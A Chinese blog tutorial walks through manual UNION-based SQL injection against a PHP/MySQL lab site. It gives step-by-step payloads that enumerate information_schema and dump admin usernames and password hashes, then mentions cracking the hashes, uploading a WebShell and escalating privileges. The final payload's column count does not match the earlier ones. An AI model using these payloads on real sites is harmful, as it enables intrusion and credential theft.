网络安全系列之二十手工SQL注入（PHP）

在掌握了MySQL的基本操作之后，在本篇博文中将介绍如何进行手工PHP注入。目标网站仍然采用NPMserv搭建，软件下载地址：http://down.51cto.com/data/1886128。

首先随便打开一个页面，利用and 1=1和and 1=2判断是否存在注入点。

然后利用order by推断字段数量，这里推断出有5个字段。

接下来执行语句“union select 1,2,3,4,5”爆出2、3字段可以调用参数。

以上操作与ASP手工注入方法基本相同，不熟悉的朋友可以参考博文http://yttitan.blog.51cto.com/70821/1560917。

下面就要开始用到MySQL的一些查询操作了。

（1） 爆基本信息

首先我们来爆出当前用户名和数据库名。

查当前用户的参数是user()，查当前数据库的参数是database()，将两个参数代入到2、3字段中：

union select 1,user(),database(),4,5

成功爆出用户名root，当前数据库名govcn

再接着爆数据库版本和操作系统版本

查数据库版本的参数是version()，查操作系统版本的参数是@@version_compile_os，将这2个参数也代入2、3字段：

union select 1,version(),@@version_compile_os,4,5

成功爆出数据库版本为5.1.35，操作系统版本为Win32。

（2） 爆出所有的数据库名

下面就要借助于information_schema数据库来爆出我们关心的敏感信息。

首先爆出系统中都存在哪些数据库：

union select 1,schema_name,3,4,5 from information_schema.schemata

information_schema是MySQL5以后的版本中默认自带的一个数据库，它里面存放了由用户在MySQL中创建的所有其它数据库的信息。information_schema数据库中默认有一个名为schemata的表，用于存放其它数据库的名字。所以上面那个查询语句的作用就是从information_schema数据库的schemata表中查询出所有数据库的名字。

这里爆出共有4个数据库：

Information_schema和mysql都是MySQL中自带的数据库，因而我们关心的就是剩余的那两个库：blog和govcn，这其中比较重要的应该是govcn，再加上之前我们已经爆出当前库就是它，所以下面自然将它列为重点目标了。

（3）爆表名

下面我们要爆出govcn数据库中都有哪些表。MySQL中所有数据库的表的信息都统一存放在information_schema数据库的tables表中，从这个表中就可以查出govcn数据库中包含哪些表。

union select 1,table_name,3,4,5 from information_schema.tables where table_schema=’govcn’

成功爆出govcn数据库中所有的表，很明显其中最重要的是admin表。

（4）爆字段名

接下来需要知道admin表中都包含哪些字段。所有数据库的所有表中的所有字段都存放在information_schema数据库中的columns表中。

union select 1,column_name,3,4,5 from information_schema.columns where table_name=’admin’

成功爆出admin表中共有2个字段：

（5）爆用户名和密码

最后一步就是需要查出在admin表中的username字段和password字段都存放了哪些数据，也就是网站的用户名和密码了。

union select 1,username,password,4,5 from admin

这里执行会出现错误，原因可能是因为网站编码不一致导致的问题，可以利用unhex(hex())函数进行编码转换：

union select 1,unhex(hex(username)),unhex(hex(password)),4 from admin

然后就成功爆出用户名admin，以及md5加密后的密码：

再接下来的工作就简单了：破解密码->登录后台->上传WebShell->提权。这里就不再重复了。

本文出自 “一壶浊酒” 博客，转载请与作者联系！

网络安全系列之二十 手工SQL注入（PHP）